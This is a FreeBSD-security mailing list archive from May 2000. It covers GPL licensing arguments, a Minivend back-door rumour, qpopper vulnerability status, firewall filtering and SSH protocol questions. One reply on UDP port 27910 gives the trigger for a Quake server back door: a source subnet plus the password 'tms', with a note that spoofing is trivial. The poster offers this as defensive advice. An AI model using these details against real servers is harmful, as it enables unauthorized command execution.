* Brett Glass [000515 11:38] wrote: > At 10:04 AM 5/15/2000, Paul Hart wrote: > > >On Mon, 15 May 2000, Brett Glass wrote: > > > > > According to Bruce Perens, the next version of the GPL will impose > > > nasty conditions upon service providers and merchants who use GPLed > > > code, such as requiring them to reveal all of their in-house additions > > > to it even if they do not redistribute it. > > > >And how much FUD spinning is that? SPIN IT BABY!! > > It's not FUD; it is the absolute truth. I have the tape of the session > at the February LinuxWorld in which Bruce said that -- emphatically. > > One of these days, people will begin to get the idea that the GPL is > not actually about freedom. It is, rather, a weapon of spite and an > attempt to accumulate power and control. I'm wondering about the following situation: Let's say postgresql was GPL'd (someone suggested it recently), now I have some custom mods to it that I use for the backend of some e-commerce site that charges a fee for it's use, perhaps some business to business application. Shouldn't I be obligated to release my source (at least my modified Postgresql source) because I'm selling the application which incorperates a GPL'd program that I've modified even though it's run over the web? Doesn't that qualify as some sort of distribution which would fall under the GPL's requirements that I distribute my code? Just wondering... -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 11:14: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from bill.minivend.com (bill.minivend.com [205.133.134.6]) by hub.freebsd.org (Postfix) with ESMTP id 5C77437B89D for ; Mon, 15 May 2000 11:13:53 -0700 (PDT) (envelope-from mike@bill.minivend.com) Received: (from mike@localhost) by bill.minivend.com (8.9.3/8.9.3) id OAA31464 for security@freebsd.org; Mon, 15 May 2000 14:12:17 -0400 Date: Mon, 15 May 2000 14:12:17 -0400 From: Mike Heins To: security@freebsd.org Subject: Re: Back door in Minivend Message-ID: <20000515141217.A31441@bill.minivend.com> Reply-To: mike@minivend.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0pre3us Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I can assure you that there are no author-inserted back doors in Minivend, as I am the author. 8-) The source is completely open and has been examined by quite a few people. If anyone hears of any security problems, let me know directly. I am positive that there has not been a vulnerability posted to Bugtraq; certainly one of the thousands of Minivend users would have brought that to my attention. (re-sent slightly changed to the list so it won't be a not-read quote in just another GPL vs. BSD license thread...) Regards, Mike Heins -- Internet Robotics, 131 Willow Lane, Floor 2, Oxford, OH 45056 phone +1.513.523.7621 fax 7501 Friends don't let friends use Outlook. -- Bob Blaylock To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 11:36: 9 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id B054537B5EE for ; Mon, 15 May 2000 11:36:05 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id MAA04291; Mon, 15 May 2000 12:35:54 -0600 (MDT) Message-Id: <4.3.1.2.20000515122445.04077a10@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.1 Date: Mon, 15 May 2000 12:35:49 -0600 To: Alfred Perlstein From: Brett Glass Subject: Re: (forw) Back door in Minivend Cc: security@FreeBSD.ORG In-Reply-To: <20000515114427.B249@fw.wintelcom.net> References: <4.3.1.2.20000515115811.045e6690@localhost> <4.3.1.2.20000515094342.045eb7e0@localhost> <4.3.1.2.20000515115811.045e6690@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 12:44 PM 5/15/2000, Alfred Perlstein wrote: >I'm wondering about the following situation: > >Let's say postgresql was GPL'd (someone suggested it recently), >now I have some custom mods to it that I use for the backend of >some e-commerce site that charges a fee for it's use, perhaps some >business to business application. > >Shouldn't I be obligated to release my source (at least my modified >Postgresql source) because I'm selling the application which >incorperates a GPL'd program that I've modified even though it's >run over the web? Doesn't that qualify as some sort of distribution >which would fall under the GPL's requirements that I distribute my >code? No, it isn't "distribution" of the work. Perens claims that it is a "public performance for profit," something which is not covered under the GPL now but would be under the new version. Of course, it's unclear if this Perens' claim would stand up in court, since -- unlike a musical performance -- running a program does not cause the text of the program to be transmitted or rendered. But then, courts are ruling in favor of the MPAA and RIAA on similar issues, so they might wrongly rule in favor of the FSF, which is at least as greedy and Draconian as those other two organizations, IMHO. A better example, which shows the real danger, is as follows. Suppose that you run your e-commerce server on Debian Linux. Under Perens' proposed regime, you would be forced to give away (for free!) the code you used in your business because it was serving the public and running on a GPLed OS. Talk about a nasty land grab. --Brett If nothing else, the brain is an educational toy. -- Tom Robbins To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 11:50:41 2000 Delivered-To: freebsd-security@freebsd.org Received: from cc942873-a.ewndsr1.nj.home.com (cc942873-a.ewndsr1.nj.home.com [24.2.89.207]) by hub.freebsd.org (Postfix) with ESMTP id 8C90F37B50C for ; Mon, 15 May 2000 11:50:37 -0700 (PDT) (envelope-from cjc@cc942873-a.ewndsr1.nj.home.com) Received: (from cjc@localhost) by cc942873-a.ewndsr1.nj.home.com (8.9.3/8.9.3) id OAA54366; Mon, 15 May 2000 14:49:59 -0400 (EDT) (envelope-from cjc) Date: Mon, 15 May 2000 14:49:59 -0400 From: "Crist J. Clark" To: Brett Glass Subject: Re: (forw) Back door in Minivend Message-ID: <20000515144959.A54078@cc942873-a.ewndsr1.nj.home.com> Reply-To: cjclark@home.com References: <4.3.1.2.20000515115811.045e6690@localhost> <4.3.1.2.20000515094342.045eb7e0@localhost> <20000515114427.B249@fw.wintelcom.net> <4.3.1.2.20000515122445.04077a10@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <4.3.1.2.20000515122445.04077a10@localhost>; from brett@lariat.org on Mon, May 15, 2000 at 12:35:49PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -chat, please. Actually, we could use a freebsd-gnu-tirade list. Better yet, freebsd-dev-null. -- Crist J. Clark cjclark@home.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 13: 2: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 5F6D337B578; Mon, 15 May 2000 13:02:06 -0700 (PDT) (envelope-from kris@FreeBSD.org) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id NAA78466; Mon, 15 May 2000 13:02:06 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Mon, 15 May 2000 13:02:06 -0700 (PDT) From: Kris Kennaway To: Brett Glass Cc: Alfred Perlstein , security@FreeBSD.ORG Subject: Re: (forw) Back door in Minivend In-Reply-To: <4.3.1.2.20000515122445.04077a10@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 15 May 2000, Brett Glass wrote: > No, it isn't "distribution" of the work. Perens claims that it is > a "public performance for profit," something which is not covered > under the GPL now but would be under the new version. Brett, please take this crap *off* freebsd-security. It's blatantly off-topic. Kris ---- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 13:17:42 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 399F837B658; Mon, 15 May 2000 13:17:39 -0700 (PDT) (envelope-from kris@FreeBSD.org) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id NAA80408; Mon, 15 May 2000 13:17:39 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Mon, 15 May 2000 13:17:39 -0700 (PDT) From: Kris Kennaway To: Visigoth Cc: freebsd-security@freebsd.org Subject: Re: qpopper discussion on BUGTRAQ In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 15 May 2000, Visigoth wrote: > I was just curious as to what the freebsd stance on the possible > qpopper-2.53 vuln as is being discussed on BUGTRAQ. Has this vuln been > tested with the freebsd port? Are there known issues? I am going to > (hopefully) be taking a look at the "exploitability" of the freebsd port > for qpopper-2.53 but I was wondering if someone had already done all the > work. I under stand that the exploit posted on bugtraq would need to be > modified, but I am wondering if the security/ports team have taken care of > the offending piece of code already (which is so often the case)... I'm not sure which of the reported vulnerabilities you're referring to, but in either case I know of the answer is "Blah blah blah, NOT vulnerable..." * BSD systems dont have the tempfile creation problems which can deny service to a user's mailbox (only SYSV directory semantics) * FreeBSD fixed the "fgets() wraparound" bug prior to the release of the bugtraq advisory. It's been on my plate to release an advisory about this since it was fixed, but I've been sidetracked with other issues. My apologies - I'll ty and get my backlog cleared this week. Kris ---- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 13:41: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from giganda.komkon.org (giganda.komkon.org [209.125.17.66]) by hub.freebsd.org (Postfix) with ESMTP id DCBEB37B6A0; Mon, 15 May 2000 13:41:03 -0700 (PDT) (envelope-from str@giganda.komkon.org) Received: (from str@localhost) by giganda.komkon.org (8.9.3/8.9.3) id QAA80539; Mon, 15 May 2000 16:41:02 -0400 (EDT) From: Igor Roshchin Message-Id: <200005152041.QAA80539@giganda.komkon.org> Subject: Re: qpopper discussion on BUGTRAQ In-Reply-To: from "Kris Kennaway" at "May 15, 2000 01:17:39 pm" To: "Kris Kennaway" Date: Mon, 15 May 2000 16:41:01 -0400 (EDT) Cc: Visigoth , freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL61 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > On Mon, 15 May 2000, Visigoth wrote: > > > I was just curious as to what the freebsd stance on the possible > > qpopper-2.53 vuln as is being discussed on BUGTRAQ. Has this vuln been > > tested with the freebsd port? Are there known issues? I am going to > > (hopefully) be taking a look at the "exploitability" of the freebsd port > > for qpopper-2.53 but I was wondering if someone had already done all the > > work. I under stand that the exploit posted on bugtraq would need to be > > modified, but I am wondering if the security/ports team have taken care of > > the offending piece of code already (which is so often the case)... > > I'm not sure which of the reported vulnerabilities you're referring to, > but in either case I know of the answer is "Blah blah blah, NOT > vulnerable..." > > * BSD systems dont have the tempfile creation problems which can deny > service to a user's mailbox (only SYSV directory semantics) > * FreeBSD fixed the "fgets() wraparound" bug prior to the release of the > bugtraq advisory. > > It's been on my plate to release an advisory about this since it was > fixed, but I've been sidetracked with other issues. My apologies - I'll ty > and get my backlog cleared this week. > > Kris > > ---- Although I am not sure which vulnerability the author of the original question is talking about, I see that there was a recent patch (April 17) related to (if I read it correctly) some buffer overflow, or smth. like that... (and IIRC there was something like that mentioned on BUGTRAQ some time ago) May be the author of the patch can clear up the question ? (sorry I don't have time/possibility to check the cvs logs now to find out how it was) Igor To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 13:44:15 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 9018737B578; Mon, 15 May 2000 13:44:12 -0700 (PDT) (envelope-from kris@FreeBSD.org) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id NAA83309; Mon, 15 May 2000 13:44:12 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Mon, 15 May 2000 13:44:11 -0700 (PDT) From: Kris Kennaway To: Igor Roshchin Cc: Visigoth , freebsd-security@FreeBSD.ORG Subject: Re: qpopper discussion on BUGTRAQ In-Reply-To: <200005152041.QAA80539@giganda.komkon.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 15 May 2000, Igor Roshchin wrote: > > * FreeBSD fixed the "fgets() wraparound" bug prior to the release of the > > bugtraq advisory. > Although I am not sure which vulnerability the author of the original question > is talking about, I see that there was a recent patch > (April 17) related to (if I read it correctly) some buffer overflow, > or smth. like that... > (and IIRC there was something like that mentioned on BUGTRAQ some time > ago) See above ;-) Kris ---- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 14: 0:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 4C3E337B81C for ; Mon, 15 May 2000 14:00:40 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id RAA41227; Mon, 15 May 2000 17:00:30 -0400 (EDT) (envelope-from wollman) Date: Mon, 15 May 2000 17:00:30 -0400 (EDT) From: Garrett Wollman Message-Id: <200005152100.RAA41227@khavrinen.lcs.mit.edu> To: Doug Barton Cc: freebsd-security@FreeBSD.ORG Subject: Re: New packaging tool (was Re: Applying patches with out a compiler) In-Reply-To: <391E4BCC.6EA3DB59@gorean.org> References: <107101bfbc60$aabeb350$040aa8c0@local.mindstep.com> <391C9CBC.4E0ED8E5@softweyr.com> <200005130137.TAA09188@nomad.yogotech.com> <391E4BCC.6EA3DB59@gorean.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > I concur. I've always wondered why (info-)zip hasn't enjoyed more > popularity in the unix world. I used it extensively back when I ran > OS/2, and it has a lot of nice features. Because post-archive-compression compresses better, if the contents of the files are similar. Also because people have a 25-year history with `tar', `ar', and similar UNIX programs; the `zip' and `unzip' programs have a non-intuitive command-line syntax, by comparison. -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 17:13: 5 2000 Delivered-To: freebsd-security@freebsd.org Received: from Awfulhak.org (tun.AwfulHak.org [194.242.139.173]) by hub.freebsd.org (Postfix) with ESMTP id 2878C37B5CF for ; Mon, 15 May 2000 17:12:59 -0700 (PDT) (envelope-from brian@Awfulhak.org) Received: from hak.lan.Awfulhak.org (root@hak.lan.awfulhak.org [172.16.0.12]) by Awfulhak.org (8.9.3/8.9.3) with ESMTP id BAA86599; Tue, 16 May 2000 01:10:33 +0100 (BST) (envelope-from brian@hak.lan.Awfulhak.org) Received: from hak.lan.Awfulhak.org (brian@localhost [127.0.0.1]) by hak.lan.Awfulhak.org (8.9.3/8.9.3) with ESMTP id BAA01357; Tue, 16 May 2000 01:10:31 +0100 (BST) (envelope-from brian@hak.lan.Awfulhak.org) Message-Id: <200005160010.BAA01357@hak.lan.Awfulhak.org> X-Mailer: exmh version 2.1.1 10/15/1999 To: Marc Silver Cc: "Dan O'Connor" , freebsd-security@FreeBSD.ORG, brian@hak.lan.Awfulhak.org Subject: Re: Firewall Rules In-Reply-To: Message from Marc Silver of "Fri, 05 May 2000 09:01:28 +0200." <20000505090128.A4456@draenor.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 16 May 2000 01:10:29 +0100 From: Brian Somers Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Do you feel that userland ppp is as safe as the kernel firewalling > options? I would like to gain a better understanding. What are the > major differences between the two? The only real difference is that ppp can filter packets based on whether they will cause a connection attempt (the dial filter) and can stop them from effecting the alive timer (the alive filter). ipfw is much more powerful, but for the standard deny/permit stuff that you're after, ppp is acceptable. If you use ipfw with ppp and want to use (say) ``tun0'' in your rules, make sure you run ppp with ``-unit 0'' to ensure that the two are in sync. [.....] > Thanks, > Marc -- Brian Don't _EVER_ lose your sense of humour ! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 20: 9:54 2000 Delivered-To: freebsd-security@freebsd.org Received: from bigphred.greycat.com (bigphred.greycat.com [207.173.133.2]) by hub.freebsd.org (Postfix) with ESMTP id 0C4D837B792 for ; Mon, 15 May 2000 20:09:50 -0700 (PDT) (envelope-from dann@bigphred.greycat.com) Received: (from dann@localhost) by bigphred.greycat.com (8.9.3/8.9.3) id UAA01096 for security@freebsd.org; Mon, 15 May 2000 20:10:00 -0700 (PDT) (envelope-from dann) Date: Mon, 15 May 2000 20:10:00 -0700 From: Dann Lunsford To: security@freebsd.org Subject: UDP port 27910 being tried Message-ID: <20000515200959.A474@greycat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Over the past couple of days, I've noted many instances of attempted connections to UDP port 27910 on my 4-STABLE box. I haven't been able to find a reference to this port on the Usual Places(tm), so this *might* be something new. Has anyone out there seen anything of this? -- Dann Lunsford The only thing necessary for the triumph of evil dann@greycat.com is that men of good will do nothing. -- Cicero To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 20:36:47 2000 Delivered-To: freebsd-security@freebsd.org Received: from closed-networks.com (closed-networks.com [195.153.248.242]) by hub.freebsd.org (Postfix) with SMTP id 4AE7C37B9F3 for ; Mon, 15 May 2000 20:36:40 -0700 (PDT) (envelope-from udp@closed-networks.com) Received: (qmail 3622 invoked by uid 1021); 16 May 2000 03:40:52 -0000 Mail-Followup-To: freebsd-security@freebsd.org, dann@greycat.com Date: Tue, 16 May 2000 04:40:52 +0100 From: User Datagram Protocol To: Dann Lunsford Cc: freebsd-security@freebsd.org Subject: Re: UDP port 27910 being tried Message-ID: <20000516044052.B2139@closed-networks.com> Reply-To: User Datagram Protocol References: <20000515200959.A474@greycat.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: <20000515200959.A474@greycat.com>; from dann@greycat.com on Mon, May 15, 2000 at 08:10:00PM -0700 X-Echelon: MI6 Cobra GCHQ Panavia MI5 Timberline IRA NSA Mossad CIA Copperhead Organization: Closed Networks Limited, London, UK Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Dann, On Mon, May 15, 2000 at 08:10:00PM -0700, Dann Lunsford wrote: > Over the past couple of days, I've noted many instances of attempted connections > to UDP port 27910 on my 4-STABLE box. I haven't been able to find a reference > to this port on the Usual Places(tm), so this *might* be something new. Has > anyone out there seen anything of this? udp port 27910 is the port for the Quake 2 game server. It's possible that people have mistaken your box for a Quake 2 server. It's also possible that they're trying to execute arbitrary commands on your box. Read http://www.insecure.org/sploits/quake.backdoor.html formore details. Mark Zielinski of RSI/repsec reported this one. Naturally, if you're running the server in a sandbox (e.g. plain chroot w/setuid or even as far as jail) then the damage would be muchly limited in the event of this compromise occuring. > ID software blatantly put a backdoor in Quake 1/2 and QuakeWorld including both the Linux/Solaris Quake2. RCON commands sent from the subnet 192.246.40.0/24 and containing the password "tms" are automaticly executed on the server without being logged. So, filtering 192.246.40.0/24 port 27910 is probably also an option. udp spoofing is trivial. I can't believe Id did this. Regards -- Bruce M. Simpson aka 'udp' Security Analyst & UNIX Development Engineer WWW: www.closed-networks.com/~udp Dundee www.packetfactory.net/~udp United Kingdom email: udp@closed-networks.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 22:26:26 2000 Delivered-To: freebsd-security@freebsd.org Received: from bigphred.greycat.com (bigphred.greycat.com [207.173.133.2]) by hub.freebsd.org (Postfix) with ESMTP id CE71137BA43; Mon, 15 May 2000 22:26:19 -0700 (PDT) (envelope-from dann@bigphred.greycat.com) Received: (from dann@localhost) by bigphred.greycat.com (8.9.3/8.9.3) id WAA01576; Mon, 15 May 2000 22:26:18 -0700 (PDT) (envelope-from dann) Date: Mon, 15 May 2000 22:26:18 -0700 From: Dann Lunsford To: security@freebsd.org Cc: freebsd-security@freebsd.org Subject: Re: UDP port 27910 being tried Message-ID: <20000515222618.A1465@greycat.com> References: <20000515200959.A474@greycat.com> <20000516044052.B2139@closed-networks.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: <20000516044052.B2139@closed-networks.com>; from udp@closed-networks.com on Tue, May 16, 2000 at 04:40:52AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Quake? Good Grief. Must have goofed when I looked for known sploits; been a loooooonnnnnngggg day :-(. Thanks to all who responded. I've blocked it at the FW. Sheesh. You think ID would Know Better... -- Dann Lunsford The only thing necessary for the triumph of evil dann@greycat.com is that men of good will do nothing. -- Cicero To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 15 22:26:26 2000 Delivered-To: freebsd-security@freebsd.org Received: from bigphred.greycat.com (bigphred.greycat.com [207.173.133.2]) by hub.freebsd.org (Postfix) with ESMTP id CE71137BA43; Mon, 15 May 2000 22:26:19 -0700 (PDT) (envelope-from dann@bigphred.greycat.com) Received: (from dann@localhost) by bigphred.greycat.com (8.9.3/8.9.3) id WAA01576; Mon, 15 May 2000 22:26:18 -0700 (PDT) (envelope-from dann) Date: Mon, 15 May 2000 22:26:18 -0700 From: Dann Lunsford To: security@freebsd.org Cc: freebsd-security@freebsd.org Subject: Re: UDP port 27910 being tried Message-ID: <20000515222618.A1465@greycat.com> References: <20000515200959.A474@greycat.com> <20000516044052.B2139@closed-networks.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: <20000516044052.B2139@closed-networks.com>; from udp@closed-networks.com on Tue, May 16, 2000 at 04:40:52AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Quake? Good Grief. Must have goofed when I looked for known sploits; been a loooooonnnnnngggg day :-(. Thanks to all who responded. I've blocked it at the FW. Sheesh. You think ID would Know Better... -- Dann Lunsford The only thing necessary for the triumph of evil dann@greycat.com is that men of good will do nothing. -- Cicero To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 16 0:12:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from www.menzor.dk (menzor.org [195.249.147.160]) by hub.freebsd.org (Postfix) with ESMTP id 349B837B8A7 for ; Tue, 16 May 2000 00:12:01 -0700 (PDT) (envelope-from ml@seeberg.dk) Received: from sos (userhost.cma.dk [130.228.127.200] (may be forged)) by www.menzor.dk (8.8.8/8.8.8) with SMTP id JAA13675 for ; Tue, 16 May 2000 09:56:54 +0200 (CEST) (envelope-from ml@seeberg.dk) Message-ID: <00bf01bfbf06$2d28f0b0$deff58c1@sos> From: "Morten Seeberg" To: Subject: SSH1, SSH2, RSA, DES, etc etc Date: Tue, 16 May 2000 09:13:01 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6700 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I often find myself messing around in all these different security schemes, features, programs and so on. Does anyone know a good link to an explanation of these? Like why would I want to use SSHx instead of SSHxx, and why encrypt with RSA instead of DES, blowfish and whatnot :) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /\/\orten $eeberg, Systems Consultant @ Merkantildata - Enterprise Solutions #echo 'System Administrators suck :)' > /dev/console To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 16 0:31:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from nsm.htp.org (nsm.htp.org [202.241.243.104]) by hub.freebsd.org (Postfix) with SMTP id 29E9437B537 for ; Tue, 16 May 2000 00:31:28 -0700 (PDT) (envelope-from sen_ml@eccosys.com) Received: (qmail 22359 invoked from network); 16 May 2000 07:27:54 -0000 Received: from localhost (127.0.0.1) by localhost with SMTP; 16 May 2000 07:27:54 -0000 To: security@freebsd.org Subject: Re: SSH1, SSH2, RSA, DES, etc etc From: sen_ml@eccosys.com In-Reply-To: <00bf01bfbf06$2d28f0b0$deff58c1@sos> References: <00bf01bfbf06$2d28f0b0$deff58c1@sos> X-Mailer: Mew version 1.94.1 on Emacs 20.6 / Mule 4.0 (HANANOEN) X-No-Archive: Yes Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: <20000516163125D.1001@eccosys.com> Date: Tue, 16 May 2000 16:31:25 +0900 X-Dispatcher: imput version 20000228(IM140) Lines: 41 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org From: "Morten Seeberg" Subject: SSH1, SSH2, RSA, DES, etc etc Date: Tue, 16 May 2000 09:13:01 +0200 Message-ID: <00bf01bfbf06$2d28f0b0$deff58c1@sos> > Does anyone know a good link to an explanation of these? not off-hand -- for crypto stuff, the book "applied cryptography 2nd ed" has pretty good descriptions of various algorithms. the handbook of applied cryptography is available via http or ftp as well, but i haven't read that myself. perhaps someone can provide a link. > Like why would I want to use SSHx instead of SSHxx, there have been some posts to the ssh mailing list concerning why use ssh1 over ssh2 or vice versa. you might consider asking there. things going for ssh1: -tested more heavily (much longer history of being deployed) -protocol is much simpler than ssh2 (less to screw up in implementation and design) things going for ssh2: -ietf drafts exist for ssh2 (will probably reach rfc status if this hasn't happened already) -has fixed a problem (may be more than one?) that exists in the ssh1 protocol there are other differences too, but none of them seemed to be clearly favorable to me. btw, iirc, openssh has (or will have soon) support for both protocol versions. > and why encrypt with RSA instead of DES, blowfish and whatnot :) to nitpick: you probably wouldn't want to be comparing a public key algorithm (RSA) w/ a symmetric key algorithm (DES) in this kind of context :-) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 16 0:34:56 2000 Delivered-To: freebsd-security@freebsd.org Received: from smtp1.interact.se (smtp1.interact.se [193.15.98.9]) by hub.freebsd.org (Postfix) with ESMTP id E92AF37B60B for ; Tue, 16 May 2000 00:34:50 -0700 (PDT) (envelope-from je@interact.se) Received: from wolfie.interact.se (je@wolfie.interact.se [193.15.98.202]) by smtp1.interact.se (InterACT Mailer) with ESMTP id JAA20537; Tue, 16 May 2000 09:36:04 +0200 (CEST) Date: Tue, 16 May 2000 09:34:58 +0200 (CEST) From: Jonas Eriksson X-Sender: je@localhost To: sen_ml@eccosys.com Cc: security@FreeBSD.ORG Subject: Re: SSH1, SSH2, RSA, DES, etc etc In-Reply-To: <20000516163125D.1001@eccosys.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > >btw, iirc, openssh has (or will have soon) support for both protocol >versions. > OpenSSH has support for SSH1 and SSH2 http://www.OpenSSH.com/ -- Jonas Eriksson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 16 4:48: 9 2000 Delivered-To: freebsd-security@freebsd.org Received: from srh0902.urh.uiuc.edu (srh0902.urh.uiuc.edu [130.126.76.224]) by hub.freebsd.org (Postfix) with SMTP id 39C7737B95A for ; Tue, 16 May 2000 04:48:06 -0700 (PDT) (envelope-from ftobin@uiuc.edu) Received: (qmail 21818 invoked by uid 1000); 16 May 2000 11:48:05 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 16 May 2000 11:48:05 -0000 Date: Tue, 16 May 2000 06:48:05 -0500 (CDT) From: Frank Tobin X-Sender: ftobin@srh0902.urh.uiuc.edu To: FreeBSD-security Mailing List Subject: pid file for named Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org One often wishes to run daemons such as named under other users, e.g., bind:bind. In order to allow bind to write out zones and associated fun stuff correctly, one then does a chmod -R bind:bind /etc/named However, the pid file, /var/run/named.pid, which named tries to write out one cannot give the proper permissions for, because it resides in a root-owned directory /var/run. Granted, named writes out this file before it drops privileges, and 